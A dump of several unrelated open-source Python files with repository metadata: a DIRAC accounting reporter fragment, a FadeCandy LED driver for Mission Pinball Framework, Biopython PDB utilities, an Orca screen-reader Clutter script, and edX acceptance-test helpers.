myBaseReporter)
self.__plotters = {}
for objName in objectsLoaded:
self.__plotters[objName[:-7]] = objectsLoaded[objName]
def getPlotterClass(self, typeName):
try:
return self.__plotters[typeName]
except KeyError:
return None
class MainReporter(object):
def __init__(self, db, setup):
self._db = db
self.setup = setup
self.csSection = getServiceSection("Accounting/ReportGenerator", setup=setup)
self.plotterList = PlottersList()
def __calculateReportHash(self, reportRequest):
requestToHash = dict(reportRequest)
granularity = gConfig.getValue("%s/CacheTimeGranularity" % self.csSection, 300)
for key in ('startTime', 'endTime'):
epoch = requestToHash[key]
requestToHash[key] = epoch - epoch % granularity
md5Hash = hashlib.md5()
md5Hash.update(repr(requestToHash))
md5Hash.update(self.setup)
return md5Hash.hexdigest()
def generate(self, reportRequest, credDict):
typeName = reportRequest['typeName']
plotterClass = self.plotterList.getPlotterClass(typeName)
if not plotterClass:
return S_ERROR("There's no reporter registered for type %s" % typeName)
if typeName in gPoliciesList:
retVal = gPoliciesList[typeName].checkRequest(reportRequest['reportName'],
credDict,
reportRequest['condDict'],
reportRequest['grouping'])
if not retVal['OK']:
return retVal
reportRequest['hash'] = self.__calculateReportHash(reportRequest)
plotter = plotterClass(self._db, self.setup, reportRequest['extraArgs'])
return plotter.generate(reportRequest)
def list(self, typeName):
plotterClass = self.plotterList.getPlotterClass(typeName)
if not plotterClass:
return S_ERROR("There's no plotter registered for type %s" % typeName)
plotter = plotterClass(self._db, self.setup)
return S_OK(plotter.plotsList())
|
arrabito/DIRAC
|
AccountingSystem/private/MainReporter.py
|
Python
|
gpl-3.0
| 2,653
|
[
"DIRAC"
] |
acb6b7b7968a87f1bc26d49eb8afa4c9f3e7251c326e9373738683eac0072c48
|
"""Contains code for an FadeCandy hardware for RGB LEDs."""
# fadecandy.py
# Mission Pinball Framework
# Written by Brian Madden & Gabe Knuth
# Released under the MIT License. (See license info at the end of this file.)
# Documentation and more info at http://missionpinball.com/mpf
import logging
import json
import struct
from mpf.system.utility_functions import Util
from mpf.platform.openpixel import OpenPixelClient
from mpf.platform.openpixel import HardwarePlatform as OPHardwarePlatform
class HardwarePlatform(OPHardwarePlatform):
"""Base class for the open pixel hardware platform.
Args:
machine: The main ``MachineController`` object.
"""
def __init__(self, machine):
super(HardwarePlatform, self).__init__(machine)
self.log = logging.getLogger("FadeCandy")
self.log.debug("Configuring FadeCandy hardware interface.")
def __repr__(self):
return '<Platform.FadeCandy>'
def _setup_opc_client(self):
self.opc_client = FadeCandyOPClient(self.machine,
self.machine.config['open_pixel_control'])
class FadeCandyOPClient(OpenPixelClient):
"""Base class of an OPC client which connects to a FadeCandy server.
Args:
machine: The main ``MachineController`` instance.
config: Dictionary which contains configuration settings for the OPC
client.
This class implements some FadeCandy-specific features that are not
available with generic OPC implementations.
"""
def __init__(self, machine, config):
super(FadeCandyOPClient, self).__init__(machine, config)
self.log = logging.getLogger('FadeCandyClient')
self.update_every_tick = True
self.gamma = self.machine.config['led_settings']['gamma']
self.whitepoint = Util.string_to_list(
self.machine.config['led_settings']['whitepoint'])
self.whitepoint[0] = float(self.whitepoint[0])
self.whitepoint[1] = float(self.whitepoint[1])
self.whitepoint[2] = float(self.whitepoint[2])
self.linear_slope = (
self.machine.config['led_settings']['linear_slope'])
self.linear_cutoff = (
self.machine.config['led_settings']['linear_cutoff'])
self.keyframe_interpolation = (
self.machine.config['led_settings']['keyframe_interpolation'])
self.dithering = self.machine.config['led_settings']['dithering']
if not self.dithering:
self.disable_dithering()
if not self.keyframe_interpolation:
self.update_every_tick = False
self.set_global_color_correction()
self.write_firmware_options()
def __repr__(self):
return '<Platform.FadeCandyOPClient>'
def set_gamma(self, gamma):
"""Sets the gamma correction of the FadeCandy. Specifically this is the
exponent for the nonlinear portion of the brightness curve.
Args:
gamma: Float of the new gamma. Default is 2.5.
"""
self.gamma = float(gamma)
self.set_global_color_correction()
def set_whitepoint(self, whitepoint):
"""Sets the white point of the FadeCandy. This is a vector of [red,
green, blue] values to multiply by colors prior to gamma correction.
Args:
whitepoint: A three-item list of floating point values. Default is
[1.0, 1.0, 1.0]
"""
self.whitepoint = whitepoint
self.set_global_color_correction()
def set_linear_slope(self, linearslope):
"""Sets the linear slope (output / input) of the linear section of the
brightness curve.
Args:
linearslope: Float of the new linear slope. Default is 1.0.
"""
self.linearslope = float(linearslope)
self.set_global_color_correction()
def set_linear_cutoff(self, linearcutoff):
"""Sets the of the linear cutoff of the FadeCandy.
From the FadeCandy documentation:
By default, brightness curves are entirely nonlinear. By setting
`linearcutoff` to a nonzero value, though, a linear area may be
defined at the bottom of the brightness curve.
The linear section, near zero, avoids creating very low output
values that will cause distracting flicker when dithered. This isn't
a problem when the LEDs are viewed indirectly such that the flicker
is below the threshold of perception, but in cases where the flicker
is a problem this linear section can eliminate it entierly at the
cost of some dynamic range. To enable the linear section, set
`linearcutoff` to some nonzero value. A good starting point is
1/256.0, correspnding to the lowest 8-bit PWM level.
Args:
linearcutoff: Float of the new linear cutoff. Default is 0.0.
"""
self.linear_cutoff = float(linearcutoff)
self.set_global_color_correction()
def enable_interpolation(self):
"""Enables the FadeCandy's keyframe interpolation.
From the FadeCandy documentation:
By default, Fadecandy interprets each frame it receives as a
keyframe. In-between these keyframes, Fadecandy will generate smooth
intermediate frames using linear interpolation. The interpolation
duration is determined by the elapsed time between when the final
packet of one frame is received and when the final packet of the
next frame is received.
This scheme works well when frames are arriving at a nearly constant
rate. If frames suddenly arrive slower than they had been arriving,
interpolation will proceed faster than it optimally should, and one
keyframe will hold steady until the next keyframe arrives. If frames
suddenly arrive faster than they had been arriving, Fadecandy will
need to jump ahead in order to avoid falling behind.
When enabled, MPF will send an update to the FadeCandy on every machine
tick (regardless of whether there are updates for the LEDs) in order to
maintain a consistent update rate.
Note that this setting is written to the FadeCandy's firmware. It will
persist until it's changed. It is enabled by default.
"""
self.keyframe_interpolation = True
self.write_firmware_options()
self.update_every_tick = True
def disable_interpolation(self):
"""Disables the FadeCandy's keyframe interpolation.
See the documentation for the ``enable_interpolation()`` method for a
description of how this works.
Note that this setting is written to the FadeCandy's firmware. It will
persist until it's changed. It is enabled by default.
"""
self.keyframe_interpolation = False
self.write_firmware_options()
self.update_every_tick = False
def enable_dithering(self):
"""Enables the FadeCandy's smooth dithering of color values.
Note that this setting is written to the FadeCandy's firmware. It will
persist until it's changed. It is enabled by default.
From the FadeCandy documentation:
Fadecandy internally represents colors with 16 bits of precision per
channel, or 48 bits per pixel. Why 48-bit color? In combination with
our dithering algorithm, this gives a lot more color resolution.
It's especially helpful near the low end of the brightness range,
where stair-stepping and color popping artifacts can be most
apparent.
"""
self.dithering = True
self.write_firmware_options()
def disable_dithering(self):
"""Disables the FadeCandy's smooth dithering of color values.
Note that this setting is written to the FadeCandy's firmware. It will
persist until it's changed. It is enabled by default.
"""
self.dithering = False
self.write_firmware_options()
def set_global_color_correction(self):
"""Writes the current global color correction settings (gamma, white
point, linear slope, and linear cutoff) to the FadeCandy server.
"""
msg = json.dumps({
'gamma': self.gamma,
'whitepoint': self.whitepoint,
'linearSlope': self.linear_slope,
'linearCutoff': self.linear_cutoff
})
self.send(struct.pack(
"!BBHHH", 0x00, 0xFF, len(msg) + 4, 0x0001, 0x0001) + msg)
def write_firmware_options(self):
"""Writes the current firmware settings (keyframe interpolation and
dithering) to the FadeCandy hardware.
"""
config_byte = 0x00
if not self.dithering:
config_byte |= 0x01
if not self.keyframe_interpolation:
config_byte |= 0x02
# manual LED control
# config_byte = config_byte | 0x04
# turn LED on
# config_byte = config_byte | 0x08
self.send(struct.pack(
"!BBHHHB", 0x00, 0xFF, 0x0005, 0x0001, 0x0002, config_byte))
# The MIT License (MIT)
# Copyright (c) 2013-2015 Brian Madden and Gabe Knuth
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
|
spierepf/mpf
|
mpf/platform/fadecandy.py
|
Python
|
mit
| 10,453
|
[
"Brian"
] |
ffdf1b0f560d3a62cd38227129ed396752d0cbc00422a17f9e24e5fd1ef187bf
|
import Bio.PDB
DIRTY_ATOMS = {'1H', '2H', '3H', 'OXT'}
BACKBONE_NAMES = {'N', 'CA', 'C', 'O', 'H', 'HA'}
def get_pdb_residue_count(pdb):
"""Returns the residue count of a Bio.PDB.Structure.Structure."""
return sum([len(c.child_list) for c in pdb.child_list[0].child_list])
def get_chain_residue_count(struct, chain_id):
"""Returns the residue count of a Bio.PDB.Structure.Structure."""
return len(get_chain(struct, chain_id).child_list)
def copy_residues(pdb, chain_ids=None):
return [r.copy() for r in get_residues(pdb, chain_ids)]
def get_residues(pdb, chain_ids=None):
"""Returns returns residues copied from a PDB.
Args:
- pdb - Bio.PDB.Structure.Structure.
- chain_ids - strip residues from these specific chain_ids only.
Returns:
- residues - a list of Bio.PDB.Residue.Residue.
"""
residues = []
for model in pdb:
for chain in model:
if chain_ids == None or chain.id in chain_ids:
residues.extend(chain.child_list)
return residues
def get_chain(struct, chain_id='A'):
"""Returns a specific chain from a Bio.PDB.Structure.Structure."""
return struct.child_list[0].child_dict[chain_id]
def get_chains(struct):
"""Returns all chains of a Bio.PDB.Structure.Structure."""
return struct.child_list[0].child_list
def read_pdb(
read_path,
pdb_name=None
):
"""Reads a PDB file and returns a BioPython structure.
Args:
- read_path - PDB string file path to read from.
- pdb_name - a string to set as the name of the Bio.PDB.Structure.Structure.
Returns:
- structure - Bio.PDB.Structure.Structure.
"""
if pdb_name == None:
pdb_name = read_path.split('/')[-1].replace('.', '_')
parser = Bio.PDB.PDBParser(PERMISSIVE=False)
structure = parser.get_structure(pdb_name, read_path)
return structure
def save_cif(**kwargs):
"""Saves a Bio.PDB.Structure.Structure as a CIF file. Does not automatically
append .cif extension.
Args:
- struct - Bio.PDB.Structure.Structure to be saved.
- path - CIF string file path.
"""
struct = kwargs.pop('struct')
path = kwargs.pop('path')
with open(path, 'w') as file:
io = Bio.PDB.mmcifio.MMCIFIO()
io.set_structure(struct)
io.save(file)
# Temporary fix for CIF files not getting parsed properly by Rosetta: add
# a dummy section at the end. ("Note that the final table in the cif file
# may not be recognized - adding a dummy entry (like `_citation.title
# ""`) to the end of the file may help.")
file.writelines('_citation.title "Elfin"')
def save_pdb(**kwargs):
"""Saves a Bio.PDB.Structure.Structure as a PDB file.
Args:
- struct - Bio.PDB.Structure.Structure to be saved.
- save_path - string file path.
"""
struct = kwargs.pop('struct')
path = kwargs.pop('path')
io = Bio.PDB.PDBIO()
io.set_structure(struct)
io.save(path)
def main():
"""main"""
raise RuntimeError('This module should not be executed as a script')
if __name__ =='__main__':
main()
|
joy13975/elfin
|
elfinpy/pdb_utilities.py
|
Python
|
mit
| 3,134
|
[
"Biopython"
] |
51fa680441e304b5e12aff2445a2e84320888fa4c5f4f3735560183c4159a78b
|
# Orca
#
# Copyright (C) 2010-2013 Igalia, S.L.
#
# Author: Alejandro Pinheiro Iglesias <apinheiro@igalia.com>
# Author: Joanmarie Diggs <jdiggs@igalia.com>
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the
# Free Software Foundation, Inc., Franklin Street, Fifth Floor,
# Boston MA 02110-1301 USA.
__id__ = "$Id$"
__version__ = "$Revision$"
__date__ = "$Date$"
__copyright__ = "Copyright (c) 2010-2013 Igalia, S.L."
__license__ = "LGPL"
from gi.repository import Gdk
import orca.scripts.default as default
import orca.debug as debug
from .script_utilities import Utilities
# Set with non printable unicode categories. Full table:
# http://www.fileformat.info/info/unicode/category/index.htm
non_printable_set = ('Cc', 'Cf', 'Cn', 'Co', 'Cs')
def _unicharIsPrint(unichar):
""" Checks if the unichar is printable
Equivalent to g_unichar_isprint
Arguments:
- unichar: unichar to check if it is printable
"""
try:
import unicodedata
category = unicodedata.category (unichar)
result = category not in non_printable_set
except:
# Normally a exception is because there are a string
# instead of a single unicode, 'Control_L'
result = False
return result
def _computeIsText(string):
"""Decides if the string representation of a keyboard event is
text or not
Based on the at-spi equivalent code.
Arguments:
- string: a string representation of a keyboardEvent.
"""
is_text = False
if string:
if _unicharIsPrint(string):
is_text = True
else:
is_text = False
return is_text
class Script(default.Script):
def __init__(self, app):
default.Script.__init__(self, app)
def getUtilities(self):
return Utilities(self)
def checkKeyboardEventData(self, keyboardEvent):
"""Processes the given keyboard event.
Here is used to:
* Fill event_string using the key.id
* Set the is_text properly
Arguments:
- keyboardEvent: an instance of input_event.KeyboardEvent
"""
# On the AtkKeyEventStruct documentation you can find this
# description:
# guint keyval;
# A guint representing a keysym value corresponding to those
# used by GDK
#
# There are no Clutter way to get a gdk-like keyvalname.
# Anyway, cally will fill event_string with the final
# representation of a text char.
#
# In the same way, Clutter provides the keyval without the
# modifiers, and GDK yes. We will try to apply it, at least
# to compute keyval_name
#
# More information:
# http://library.gnome.org/devel/atk/stable/AtkUtil.html
# http://bugzilla.o-hand.com/show_bug.cgi?id=2072
# apply the modifiers to keyboardEvent.id
#
keyval = keyboardEvent.id
try:
keymap = Gdk.Keymap.get_default()
if keymap:
success, entries = keymap.get_entries_for_keyval(keyval)
group = entries[0].group
modifiers = Gdk.ModifierType(keyboardEvent.modifiers)
success, keyval, egroup, level, consumed = \
keymap.translate_keyboard_state (keyboardEvent.hw_code,
modifiers,
group)
except:
debug.println(debug.LEVEL_FINE,
"Could not compute keyval with modifiers")
string = "prev keyval=%d" % keyboardEvent.id
string = string + " post keyval=%d" % keyval
debug.println(debug.LEVEL_FINE, string)
keyboardEvent.id = keyval
# if cally doesn't provide a event_string we get that using
# Gdk. I know that it will probably called again computing
# keyval_name but to simplify code, and not start to add
# guess-code here I will maintain that in this way
#
if (keyboardEvent.event_string == ""):
debug.println (debug.LEVEL_FINE, "Computing event_string")
try:
keyboardEvent.event_string = Gdk.keyval_name(keyboardEvent.id)
except:
debug.println(debug.LEVEL_FINE,
"Could not obtain keyval_name for id: %d" \
% keyboardEvent.id)
# at-spi uses event_string to compute is_text, so if it is
# NULL we should compute again with the proper
# event_string
#
keyboardEvent.is_text = _computeIsText(keyboardEvent.event_string)
return default.Script.checkKeyboardEventData(self, keyboardEvent)
|
ruibarreira/linuxtrail
|
usr/lib/python3/dist-packages/orca/scripts/toolkits/clutter/script.py
|
Python
|
gpl-3.0
| 5,376
|
[
"ORCA"
] |
eb8c5b99ce38f50494887d7e83aff70540aceb448fb580afdb6f466c385fdf37
|
"""
Test helper functions and base classes.
"""
import functools
import inspect
import json
import operator
import os
import pprint
import unittest
import urlparse
from contextlib import contextmanager
from datetime import datetime
from unittest import TestCase
import requests
from bok_choy.javascript import js_defined
from bok_choy.page_object import XSS_INJECTION
from bok_choy.promise import EmptyPromise, Promise
from bok_choy.web_app_test import WebAppTest
from opaque_keys.edx.locator import CourseLocator
from path import Path as path
from pymongo import ASCENDING, MongoClient
from selenium.common.exceptions import StaleElementReferenceException
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.support.select import Select
from selenium.webdriver.support.ui import WebDriverWait
from capa.tests.response_xml_factory import MultipleChoiceResponseXMLFactory
from common.test.acceptance.fixtures.course import XBlockFixtureDesc
from common.test.acceptance.pages.common import BASE_URL
from common.test.acceptance.pages.common.auto_auth import AutoAuthPage
from openedx.core.lib.tests.assertions.events import EventMatchTolerates, assert_event_matches, is_matching_event
from openedx.core.release import RELEASE_LINE, doc_version
from xmodule.partitions.partitions import UserPartition
MAX_EVENTS_IN_FAILURE_OUTPUT = 20
def skip_if_browser(browser):
"""
Method decorator that skips a test if browser is `browser`
Args:
browser (str): name of internet browser
Returns:
Decorated function
"""
def decorator(test_function):
@functools.wraps(test_function)
def wrapper(self, *args, **kwargs):
if self.browser.name == browser:
raise unittest.SkipTest('Skipping as this test will not work with {}'.format(browser))
test_function(self, *args, **kwargs)
return wrapper
return decorator
def is_youtube_available():
"""
Check if the required youtube urls are available.
If a URL in `youtube_api_urls` is not reachable then subsequent URLs will not be checked.
Returns:
bool:
"""
# TODO: Design and implement a better solution that is reliable and repeatable,
# reflects how the application works in production, and limits the third-party
# network traffic (e.g. repeatedly retrieving the js from youtube from the browser).
youtube_api_urls = {
'main': 'https://www.youtube.com/',
'player': 'https://www.youtube.com/iframe_api',
# For transcripts, you need to check an actual video, so we will
# just specify our default video and see if that one is available.
'transcript': 'http://video.google.com/timedtext?lang=en&v=3_yD_cEKoCk',
}
for url in youtube_api_urls.itervalues():
try:
response = requests.get(url, allow_redirects=False)
except requests.exceptions.ConnectionError:
return False
if response.status_code >= 300:
return False
return True
def is_focused_on_element(browser, selector):
"""
Check if the focus is on the element that matches the selector.
"""
return browser.execute_script("return $('{}').is(':focus')".format(selector))
def load_data_str(rel_path):
"""
Load a file from the "data" directory as a string.
`rel_path` is the path relative to the data directory.
"""
full_path = path(__file__).abspath().dirname() / "data" / rel_path
with open(full_path) as data_file:
return data_file.read()
def remove_file(filename):
"""
Remove a file if it exists
"""
if os.path.exists(filename):
os.remove(filename)
def disable_animations(page):
"""
Disable jQuery and CSS3 animations.
"""
disable_jquery_animations(page)
disable_css_animations(page)
def enable_animations(page):
"""
Enable jQuery and CSS3 animations.
"""
enable_jquery_animations(page)
enable_css_animations(page)
@js_defined('window.jQuery')
def disable_jquery_animations(page):
"""
Disable jQuery animations.
"""
page.browser.execute_script("jQuery.fx.off = true;")
@js_defined('window.jQuery')
def enable_jquery_animations(page):
"""
Enable jQuery animations.
"""
page.browser.execute_script("jQuery.fx.off = false;")
def disable_css_animations(page):
"""
Disable CSS3 animations, transitions, transforms.
"""
page.browser.execute_script("""
var id = 'no-transitions';
// if styles were already added, just do nothing.
if (document.getElementById(id)) {
return;
}
var css = [
'* {',
'-webkit-transition: none !important;',
'-moz-transition: none !important;',
'-o-transition: none !important;',
'-ms-transition: none !important;',
'transition: none !important;',
'-webkit-transition-property: none !important;',
'-moz-transition-property: none !important;',
'-o-transition-property: none !important;',
'-ms-transition-property: none !important;',
'transition-property: none !important;',
'-webkit-transform: none !important;',
'-moz-transform: none !important;',
'-o-transform: none !important;',
'-ms-transform: none !important;',
'transform: none !important;',
'-webkit-animation: none !important;',
'-moz-animation: none !important;',
'-o-animation: none !important;',
'-ms-animation: none !important;',
'animation: none !important;',
'}'
].join(''),
head = document.head || document.getElementsByTagName('head')[0],
styles = document.createElement('style');
styles.id = id;
styles.type = 'text/css';
if (styles.styleSheet){
styles.styleSheet.cssText = css;
} else {
styles.appendChild(document.createTextNode(css));
}
head.appendChild(styles);
""")
def enable_css_animations(page):
"""
Enable CSS3 animations, transitions, transforms.
"""
page.browser.execute_script("""
var styles = document.getElementById('no-transitions'),
head = document.head || document.getElementsByTagName('head')[0];
head.removeChild(styles)
""")
def select_option_by_text(select_browser_query, option_text, focus_out=False):
"""
Chooses an option within a select by text (helper method for Select's select_by_visible_text method).
Wrap this in a Promise to prevent a StaleElementReferenceException
from being raised while the DOM is still being rewritten
"""
def select_option(query, value):
""" Get the first select element that matches the query and select the desired value. """
try:
select = Select(query.first.results[0])
select.select_by_visible_text(value)
if focus_out:
query.first.results[0].send_keys(Keys.TAB)
return True
except StaleElementReferenceException:
return False
msg = 'Selected option {}'.format(option_text)
EmptyPromise(lambda: select_option(select_browser_query, option_text), msg).fulfill()
def get_selected_option_text(select_browser_query):
"""
Returns the text value for the first selected option within a select.
Wrap this in a Promise to prevent a StaleElementReferenceException
from being raised while the DOM is still being rewritten
"""
def get_option(query):
""" Get the first select element that matches the query and return its value. """
try:
select = Select(query.first.results[0])
return (True, select.first_selected_option.text)
except StaleElementReferenceException:
return (False, None)
text = Promise(lambda: get_option(select_browser_query), 'Retrieved selected option text').fulfill()
return text
def get_options(select_browser_query):
"""
Returns all the options for the given select.
"""
return Select(select_browser_query.first.results[0]).options
def generate_course_key(org, number, run):
"""
Makes a CourseLocator from org, number and run
"""
default_store = os.environ.get('DEFAULT_STORE', 'draft')
return CourseLocator(org, number, run, deprecated=(default_store == 'draft'))
def select_option_by_value(browser_query, value, focus_out=False):
"""
Selects a html select element by matching value attribute
"""
select = Select(browser_query.first.results[0])
select.select_by_value(value)
def options_selected():
"""
Returns True if all options in select element where value attribute
matches `value`. if any option is not selected then returns False
and select it. if value is not an option choice then it returns False.
"""
all_options_selected = True
has_option = False
for opt in select.options:
if opt.get_attribute('value') == value:
has_option = True
if not opt.is_selected():
all_options_selected = False
opt.click()
if all_options_selected and not has_option:
all_options_selected = False
if focus_out:
browser_query.first.results[0].send_keys(Keys.TAB)
return all_options_selected
# Make sure specified option is actually selected
EmptyPromise(options_selected, "Option is selected").fulfill()
def is_option_value_selected(browser_query, value):
"""
return true if given value is selected in html select element, else return false.
"""
select = Select(browser_query.first.results[0])
ddl_selected_value = select.first_selected_option.get_attribute('value')
return ddl_selected_value == value
def element_has_text(page, css_selector, text):
"""
Return true if the given text is present in the list.
"""
text_present = False
text_list = page.q(css=css_selector).text
if len(text_list) > 0 and (text in text_list):
text_present = True
return text_present
def get_modal_alert(browser):
"""
Returns instance of modal alert box shown in browser after waiting
for 6 seconds
"""
WebDriverWait(browser, 6).until(EC.alert_is_present())
return browser.switch_to.alert
def get_element_padding(page, selector):
"""
Get Padding of the element with given selector,
:returns a dict object with the following keys.
1 - padding-top
2 - padding-right
3 - padding-bottom
4 - padding-left
Example Use:
progress_page.get_element_padding('.wrapper-msg.wrapper-auto-cert')
"""
js_script = """
var $element = $('%(selector)s');
element_padding = {
'padding-top': $element.css('padding-top').replace("px", ""),
'padding-right': $element.css('padding-right').replace("px", ""),
'padding-bottom': $element.css('padding-bottom').replace("px", ""),
'padding-left': $element.css('padding-left').replace("px", "")
};
return element_padding;
""" % {'selector': selector}
return page.browser.execute_script(js_script)
def is_404_page(browser):
""" Check if page is 404 """
return 'Page not found (404)' in browser.find_element_by_tag_name('h1').text
def create_multiple_choice_xml(correct_choice=2, num_choices=4):
"""
Return the Multiple Choice Problem XML, given the name of the problem.
"""
# all choices are incorrect except for correct_choice
choices = [False for _ in range(num_choices)]
choices[correct_choice] = True
choice_names = ['choice_{}'.format(index) for index in range(num_choices)]
question_text = 'The correct answer is Choice {}'.format(correct_choice)
return MultipleChoiceResponseXMLFactory().build_xml(
question_text=question_text,
choices=choices,
choice_names=choice_names,
)
def create_multiple_choice_problem(problem_name):
"""
Return the Multiple Choice Problem Descriptor, given the name of the problem.
"""
xml_data = create_multiple_choice_xml()
return XBlockFixtureDesc(
'problem',
problem_name,
data=xml_data,
metadata={'rerandomize': 'always'}
)
def auto_auth(browser, username, email, staff, course_id):
"""
Logout and login with given credentials.
"""
AutoAuthPage(browser, username=username, email=email, course_id=course_id, staff=staff).visit()
def assert_link(test, expected_link, actual_link):
"""
Assert that 'href' and text inside help DOM element are correct.
Arguments:
test: Test on which links are being tested.
expected_link (dict): The expected link attributes.
actual_link (dict): The actual link attribute on page.
"""
test.assertEqual(expected_link['href'], actual_link.get_attribute('href'))
test.assertEqual(expected_link['text'], actual_link.text)
def assert_opened_help_link_is_correct(test, url):
"""
Asserts that url of browser when help link is clicked is correct.
Arguments:
test (AcceptanceTest): test calling this method.
url (str): url to verify.
"""
test.browser.switch_to_window(test.browser.window_handles[-1])
WebDriverWait(test.browser, 10).until(lambda driver: driver.current_url == url)
# Check that the URL loads. Can't do this in the browser because it might
# be loading a "Maze Found" missing content page.
response = requests.get(url)
test.assertEqual(response.status_code, 200, "URL {!r} returned {}".format(url, response.status_code))
EDX_BOOKS = {
'course_author': 'edx-partner-course-staff',
'learner': 'edx-guide-for-students',
}
OPEN_BOOKS = {
'course_author': 'open-edx-building-and-running-a-course',
'learner': 'open-edx-learner-guide',
}
def url_for_help(book_slug, path):
"""
Create a full help URL given a book slug and a path component.
"""
# Emulate the switch between books that happens in envs/bokchoy.py
books = EDX_BOOKS if RELEASE_LINE == "master" else OPEN_BOOKS
url = 'http://edx.readthedocs.io/projects/{}/en/{}{}'.format(books[book_slug], doc_version(), path)
return url
class EventsTestMixin(TestCase):
"""
Helpers and setup for running tests that evaluate events emitted
"""
def setUp(self):
super(EventsTestMixin, self).setUp()
mongo_host = 'edx.devstack.mongo' if 'BOK_CHOY_HOSTNAME' in os.environ else 'localhost'
self.event_collection = MongoClient(mongo_host)["test"]["events"]
self.start_time = datetime.now()
def reset_event_tracking(self):
"""Drop any events that have been collected thus far and start collecting again from scratch."""
self.event_collection.drop()
self.start_time = datetime.now()
@contextmanager
def capture_events(self, event_filter=None, number_of_matches=1, captured_events=None):
"""
Context manager that captures all events emitted while executing a particular block.
All captured events are stored in the list referenced by `captured_events`. Note that this list is appended to
*in place*. The events will be appended to the list in the order they are emitted.
The `event_filter` is expected to be a callable that allows you to filter the event stream and select particular
events of interest. A dictionary `event_filter` is also supported, which simply indicates that the event should
match that provided expectation.
`number_of_matches` tells this context manager when enough events have been found and it can move on. The
context manager will not exit until this many events have passed the filter. If not enough events are found
before a timeout expires, then this will raise a `BrokenPromise` error. Note that this simply states that
*at least* this many events have been emitted, so `number_of_matches` is simply a lower bound for the size of
`captured_events`.
"""
start_time = datetime.utcnow()
yield
events = self.wait_for_events(
start_time=start_time, event_filter=event_filter, number_of_matches=number_of_matches)
if captured_events is not None and hasattr(captured_events, 'append') and callable(captured_events.append):
for event in events:
captured_events.append(event)
@contextmanager
def assert_events_match_during(self, event_filter=None, expected_events=None, in_order=True):
"""
Context manager that ensures that events matching the `event_filter` and `expected_events` are emitted.
This context manager will filter out the event stream using the `event_filter` and wait for
`len(expected_events)` to match the filter.
It will then compare the events in order with their counterpart in `expected_events` to ensure they match the
more detailed assertion.
Typically `event_filter` will be an `event_type` filter and the `expected_events` list will contain more
detailed assertions.
"""
captured_events = []
with self.capture_events(event_filter, len(expected_events), captured_events):
yield
self.assert_events_match(expected_events, captured_events, in_order=in_order)
def wait_for_events(self, start_time=None, event_filter=None, number_of_matches=1, timeout=None):
"""
Wait for `number_of_matches` events to pass the `event_filter`.
By default, this will look at all events that have been emitted since the beginning of the setup of this mixin.
A custom `start_time` can be specified which will limit the events searched to only those emitted after that
time.
The `event_filter` is expected to be a callable that allows you to filter the event stream and select particular
events of interest. A dictionary `event_filter` is also supported, which simply indicates that the event should
match that provided expectation.
`number_of_matches` lets us know when enough events have been found and it can move on. The function will not
return until this many events have passed the filter. If not enough events are found before a timeout expires,
then this will raise a `BrokenPromise` error. Note that this simply states that *at least* this many events have
been emitted, so `number_of_matches` is simply a lower bound for the size of `captured_events`.
Specifying a custom `timeout` can allow you to extend the default 30 second timeout if necessary.
"""
if start_time is None:
start_time = self.start_time
if timeout is None:
timeout = 30
def check_for_matching_events():
"""Gather any events that have been emitted since `start_time`"""
return self.matching_events_were_emitted(
start_time=start_time,
event_filter=event_filter,
number_of_matches=number_of_matches
)
return Promise(
check_for_matching_events,
# This is a bit of a hack, Promise calls str(description), so I set the description to an object with a
# custom __str__ and have it do some intelligent stuff to generate a helpful error message.
CollectedEventsDescription(
'Waiting for {number_of_matches} events to match the filter:\n{event_filter}'.format(
number_of_matches=number_of_matches,
event_filter=self.event_filter_to_descriptive_string(event_filter),
),
functools.partial(self.get_matching_events_from_time, start_time=start_time, event_filter={})
),
timeout=timeout
).fulfill()
def matching_events_were_emitted(self, start_time=None, event_filter=None, number_of_matches=1):
"""Return True if enough events have been emitted that pass the `event_filter` since `start_time`."""
matching_events = self.get_matching_events_from_time(start_time=start_time, event_filter=event_filter)
return len(matching_events) >= number_of_matches, matching_events
def get_matching_events_from_time(self, start_time=None, event_filter=None):
"""
Return a list of events that pass the `event_filter` and were emitted after `start_time`.
This function is used internally by most of the other assertions and convenience methods in this class.
The `event_filter` is expected to be a callable that allows you to filter the event stream and select particular
events of interest. A dictionary `event_filter` is also supported, which simply indicates that the event should
match that provided expectation.
"""
if start_time is None:
start_time = self.start_time
if isinstance(event_filter, dict):
event_filter = functools.partial(is_matching_event, event_filter)
elif not callable(event_filter):
raise ValueError(
'event_filter must either be a dict or a callable function with as single "event" parameter that '
'returns a boolean value.'
)
matching_events = []
cursor = self.event_collection.find(
{
"time": {
"$gte": start_time
}
}
).sort("time", ASCENDING)
for event in cursor:
matches = False
try:
# Mongo automatically assigns an _id to all events inserted into it. We strip it out here, since
# we don't care about it.
del event['_id']
if event_filter is not None:
# Typically we will be grabbing all events of a particular type, however, you can use arbitrary
# logic to identify the events that are of interest.
matches = event_filter(event)
except AssertionError:
# allow the filters to use "assert" to filter out events
continue
else:
if matches is None or matches:
matching_events.append(event)
return matching_events
